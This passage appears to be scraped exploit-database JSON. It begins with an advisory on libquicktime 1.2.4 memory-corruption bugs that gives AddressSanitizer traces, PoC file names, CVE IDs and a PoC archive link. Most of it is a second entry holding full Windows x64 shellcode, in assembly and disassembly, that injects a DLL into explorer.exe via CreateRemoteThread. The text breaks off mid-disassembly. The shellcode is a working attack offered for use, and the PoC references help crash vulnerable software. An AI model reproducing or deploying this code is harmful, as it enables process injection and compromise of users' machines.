info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14359==ABORTING\r\n \r\n \r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\nStopped reason: SIGSEGV\r\n0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>, \r\n _output=<optimized out>) at util.c:874\r\n874if(input[0] == output[0] &&\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\nCVE:\r\nCVE-2017-9124\r\n \r\n \r\n###################################\r\n4.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528\r\nREAD of size 4 at 0x602000009cd4 thread T0\r\n #0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242\r\n #1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138\r\n #2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996\r\n #3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa\r\n 0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01\r\n 0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa\r\n=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==40038==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9125\r\n \r\n \r\n###################################\r\n5.\r\nthe quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718\r\nWRITE of size 1 at 0x602000009ce4 thread T0\r\n #0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69\r\n #1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147\r\n #2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56\r\n #3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220\r\n #4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41637==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9126\r\n \r\n \r\n###################################\r\n6.\r\nthe quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8\r\nWRITE of size 1 at 0x602000009cb1 thread T0\r\n #0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84\r\n #1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557\r\n #2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694\r\n #3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336\r\n #4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231\r\n #5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41642==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9127\r\n \r\n \r\n###################################\r\n7.\r\nthe quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008\r\nREAD of size 4 at 0x602000009d00 thread T0\r\n #0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998\r\n #1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633\r\n #2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891\r\n #3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd\r\n 0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04\r\n=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\n 0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==10979==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9128\r\n \r\n \r\n \r\n \r\n=================================\r\n \r\n \r\nqflb.wu () dbappsecurity com cn\r\n \r\n \r\nProofs of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip\n\n# 0day.today [2018-02-27] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27921"}, {"lastseen": "2018-03-09T21:08:22", "references": [], "description": "Exploit for win64 platform in category shellcode", "edition": 1, "reporter": "Roziul Hasan Khan Shifat", "published": "2017-01-16T00:00:00", "type": "zdt", "title": "Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-01-16T00:00:00", "href": "https://0day.today/exploit/description/26704", "id": "1337DAY-ID-26704", "sourceData": "/*\r\n \r\n Title: Windows x64 dll injection shellcode (using CreateRemoteThread())\r\n Size: 584 bytes\r\n Date: 16-01-2017\r\n Author: Roziul Hasan Khan Shifat\r\n Tested On : Windows 7 x64\r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n//Note : i wrtie it for process injection\r\n//It may work in exploit\r\n \r\n \r\n \r\n/*\r\n \r\nsection .text\r\n global _start\r\n_start:\r\nxor r8,r8\r\npush r8\r\npush r8\r\n \r\nmov [rsp],dword 'expl'\r\nmov [rsp+4],dword 'orer'\r\nmov [rsp+8],dword '.exe'\r\n \r\nlea rcx,[rsp] ;;process name (explorer.exe) change it if U want\r\n \r\n \r\npush r8\r\npush r8\r\npush r8\r\n \r\n \r\n \r\nmov [rsp],dword 'C:\\U'\r\nmov [rsp+4],dword 'sers'\r\nmov [rsp+8],dword '\\Pub'\r\nmov [rsp+12],dword 'lic\\'\r\nmov [rsp+16],dword 'in.d'\r\nmov [rsp+20],word 'll'\r\n \r\nlea rdx,[rsp] ;path of the dll (change it to U full path of dll)\r\n \r\n \r\n \r\n \r\n;--------------------------------------------------------\r\n \r\nmov r8w,336\r\n \r\nsub rsp,r8\r\nlea r12,[rsp]\r\n \r\npush 24\r\npop r8 ;(important: length of dll path string including null byte)\r\n \r\n \r\nmov [r12],rcx ;process name\r\nmov [r12+8],rdx ;dll path\r\nmov [r12+16],r8 ;length of dll path string\r\n \r\n;----------------------------------------------------------\r\n \r\n \r\n \r\n \r\n \r\n_main:\r\n \r\ncdq\r\nmov rax,[gs:rdx+0x60] ;peb\r\nmov rax,[rax+0x18] ;peb->Ldr\r\nmov rsi,[rax+0x10] ;peb->Ldr.InMemOrderModuleList\r\nlodsq\r\nmov rsi,[rax]\r\nmov rdi,[rsi+0x30] ;rdi=kernel32.dll base address\r\n \r\n \r\n \r\n;------------------------------------------\r\nmov dl,0x88\r\nmov ebx,[rdi+0x3c] ;DOS_HEADER->elf_anew\r\nadd rbx,rdi ;IMAGE_OPTIONAL_HEADER32\r\nmov ebx,[rbx+rdx] ;IMAGE_DATA_DIRECTORY->VirtualAddress\r\nadd rbx,rdi ;IMAGE_EXPORT_DIRECTORY (Export table of kernel32.dll)\r\n \r\nmov esi,[rbx+0x1c] ;kenrel32.dll AddressOfFunction\r\nadd rsi,rdi\r\n \r\n;-------------------------------------------------------\r\n;loading msvcrt.dll\r\ncdq\r\npush rdx\r\nmov dx,832\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\n \r\nmov [rsp],dword 'msvc' \r\nmov [rsp+4],word 'rt'\r\n \r\nlea rcx,[rsp]\r\n \r\nsub rsp,88\r\n \r\ncall rbx\r\n \r\n;-------------------------------\r\n;Finding address of strcmp()\r\n \r\nlea rdx,[rsp+88]\r\nmov [rdx],dword 'strc'\r\nmov [rdx+4],word 'mp'\r\n \r\nmov rcx,rax\r\n \r\nmov r8w,587*4\r\nmov ebx,[rsi+r8]\r\nadd rbx,rdi\r\n \r\ncall rbx\r\n;-----------------------------\r\nmov [r12+24],rax ;address of strcmp()\r\n;---------------------------------------------------------------\r\n \r\nmov dx,190*4\r\nmov ebx,[rsi+rdx]\r\nadd rbx,rdi ;CreateToolhelp32Snapshot()\r\n \r\n;--------------------------------\r\n \r\n;HANDLE WINAPI CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)\r\nxor rdx,rdx ;DWORD th32ProcessID\r\npush 2\r\npop rcx ;DWORD dwFlags\r\ncall rbx\r\n \r\nmov r13,rax ;HANDLE\r\ncmp r13,-1\r\nje __exit\r\n;---------------------------------------------\r\nmov dx,304\r\n \r\nmov [r12+32],dword edx ;sizeof PROCESSENTRY32\r\n \r\n \r\n \r\nmov dx,920*4\r\nmov ebx,[rsi+rdx]\r\nadd rbx,rdi ;rbx=Process32First()\r\n \r\n;WINBOOL WINAPI Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);\r\n \r\nlea rdx,[r12+32] ;LPPROCESSENTRY32 lppe\r\nmov rcx,r13 ;HANDLE hSnapshot\r\n \r\n \r\ncall rbx\r\n \r\ncmp rax,1\r\njne __exit\r\n \r\n;---------------------------------------------------\r\n \r\nxor rdx,rdx\r\nmov dx,922*4\r\nmov r15d,[rsi+rdx]\r\nadd r15,rdi ;r15=Process32Next()\r\n \r\n \r\n \r\nsub rsp,88\r\nget_pid:\r\nlea rcx,[r12+76] ;PROCESSENRY32.CHAR szExeFile[MAX_PATH=260]\r\nmov rdx,[r12] ;process name\r\nmov rbx,[r12+24] ;strcmp()\r\ncall rbx\r\n \r\nxor rdx,rdx\r\ncmp rax,rdx\r\njz inject\r\n \r\n;WINBOOL WINAPI Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)\r\nmov rcx,r13\r\nlea rdx,[r12+32]\r\ncall r15\r\n \r\ncmp rax,1\r\nje get_pid\r\n \r\nleave\r\nret\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n__exit:\r\nxor rdx,rdx\r\npush rdx\r\nmov dx,297*4\r\nmov ebx,[rsi+rdx]\r\nadd rbx,rdi\r\n \r\npop rcx\r\ncall rbx\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n;--------------------------------------------------\r\n;------------------------------------------------------\r\n;inject function\r\ninject:\r\n \r\nxor rdx,rdx\r\npush rdx\r\npop r10\r\n \r\nmov r10w,899*4\r\nmov ebx,[rsi+r10]\r\nadd rbx,rdi ;rbx=OpenProcess()\r\n \r\n;WINBASEAPI HANDLE WINAPI OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId)\r\n \r\npush rdx\r\npop rcx\r\n \r\nmov r8d,[r12+40] ;PROCESSENTRY32.DWORD th32ProcessID\r\n \r\n;0x1e84800a-0x1e65700b=2035711 (PROCESS_ALL_ACCESS)\r\n \r\nmov ecx,0x1e84800a\r\nsub ecx,0x1e65700b\r\n \r\ncall rbx\r\n \r\nmov r13,rax ;PROCESS HANDLE\r\ncmp r13,-1\r\nje __exit\r\n;--------------------------------------------------------------------\r\n \r\nmov dx,1279\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi ;VirualAlloc()\r\n \r\n;WINBASEAPI LPVOID WINAPI VirtualAllocEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)\r\nsub rsp,88\r\n \r\nmov rcx,r13 ;HANDLE hProcess\r\nxor rdx,rdx ;LPVOID lpAddress\r\nmov r8,[r12+16] ;SIZE_T dwSize\r\nmov r9w,0x2fff \r\ninc r9;DWORD flAllocationType = (MEM_COMMIT | MEM_RESERVE)\r\nmov [rsp+32],byte 0x4 ;DWORD flProtect = PAGE_READWRITE\r\ncall rbx\r\n \r\nmov r14,rax ;LPVOID address\r\nxor rdx,rdx\r\ncmp rax,rdx\r\njz __exit\r\n \r\n \r\n;-----------------------------------------------------------------------------------\r\nmov dx,1347\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi ;WriteProcessMemory()\r\nsub rsp,88\r\nxor rdx,rdx\r\n;WINBASEAPI WINBOOL WINAPI WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)\r\nmov [rsp+32],rdx ;SIZE_T *lpNumberOfBytesWritten\r\nmov rcx,r13 ;HANDLE hProcess\r\nmov rdx,r14 ;LPVOID lpBaseAddress\r\nmov r8,[r12+8] ;LPCVOID lpBuffer\r\nmov r9,[r12+16] ;SIZE_T nSize\r\n \r\ncall rbx\r\n \r\n \r\n \r\ncmp rax,1\r\njne __exit\r\n \r\n;------------------------------------------------------------------------------------\r\nmov dx,170*4\r\nmov ebx,[rsi+rdx]\r\nadd rbx,rdi ;CreateRemoteThread()\r\n \r\nxor rdx,rdx\r\nsub rsp,88\r\n;WINBASEAPI HANDLE WINAPI CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)\r\n \r\nmov rcx,r13 ;HANDLE hProcess\r\npush rdx\r\npush rdx\r\npop r8 ;SIZE_T dwStackSize\r\n \r\nmov dx,832\r\nmov r9d,[rsi+rdx*4]\r\nadd r9,rdi ;LPTHREAD_START_ROUTINE lpStartAddress (LoadLibraryA())\r\n \r\npop rdx ;LPSECURITY_ATTRIBUTES lpThreadAttributes\r\nmov [rsp+32],r14 ;LPVOID lpParameter\r\nmov [rsp+40],r8\r\nmov [rsp+48],r8\r\ncall rbx\r\n \r\ncall __exit\r\n \r\n;------------------------------------------------------------\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n/*\r\n \r\n \r\n \r\ndll_inj.obj: file format pe-x86-64\r\n \r\n \r\nDisassembly of section .text:\r\n \r\n0000000000000000 <_start>:\r\n 0: 4d 31 c0 xor %r8,%r8\r\n 3: 41 50 push %r8\r\n 5: 41 50 push %r8\r\n 7: c7 04 24 65 78 70 6c movl $0x6c707865,(%rsp)\r\n e: c7 44 24 04 6f 72 65 movl $0x7265726f,0x4(%rsp)\r\n 15: 72 \r\n 16: c7 44 24 08 2e 65 78 movl $0x6578652e,0x8(%rsp)\r\n 1d: 65 \r\n 1e: 48 8d 0c 24 lea (%rsp),%rcx\r\n 22: 41 50 push %r8\r\n 24: 41 50 push %r8\r\n 26: 41 50 push %r8\r\n 28: c7 04 24 43 3a 5c 55 movl $0x555c3a43,(%rsp)\r\n 2f: c7 44 24 04 73 65 72 movl $0x73726573,0x4(%rsp)\r\n 36: 73 \r\n 37: c7 44 24 08 5c 50 75 movl $0x6275505c,0x8(%rsp)\r\n 3e: 62 \r\n 3f: c7 44 24 0c 6c 69 63 movl $0x5c63696c,0xc(%rsp)\r\n 46: 5c \r\n 47: c7 44 24 10 69 6e 2e movl $0x642e6e69,0x10(%rsp)\r\n 4e: 64 \r\n 4f: 66 c7 44 24 14 6c 6c movw $0x6c6c,0x14(%rsp)\r\n 56: 48 8d 14 24 lea (%rsp),%rdx\r\n 5a: 66 41 b8 50 01 mov $0x150,%r8w\r\n 5f: 4c 29 c4 sub %r8,%rsp\r\n 62: 4c 8d 24 24 lea (%rsp),%r12\r\n 66: 6a 18 pushq $0x18\r\n 68: 41 58 pop %r8\r\n 6a: 49 89 0c 24 mov %rcx,(%r12)\r\n 6e: 49 89 54 24 08 mov %rdx,0x8(%r12)\r\n 73: 4d 89 44 24 10 mov %r8,0x10(%r12)\r\n \r\n0000000000000078 <_main>:\r\n 78: 99 cltd \r\n 79: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax\r\n 7e: 48 8b 40 18 mov 0x18(%rax),%rax\r\n 82: 48 8b 70 10 mov 0x10(%rax),%rsi\r\n 86: 48 ad lods %ds:(%rsi),%rax\r\n 88: 48 8b 30 mov (%rax),%rsi\r\n 8b: 48 8b 7e 30 mov 0x30(%rsi),%rdi\r\n 8f: b2 88 mov $0x88,%dl\r\n 91: 8b 5f 3c mov 0x3c(%rdi),%ebx\r\n 94: 48 01 fb add %rdi,%rbx\r\n 97: 8b 1c 13 mov (%rbx,%rdx,1),%ebx\r\n 9a: 48 01 fb add %rdi,%rbx\r\n 9d: 8b 73 1c mov 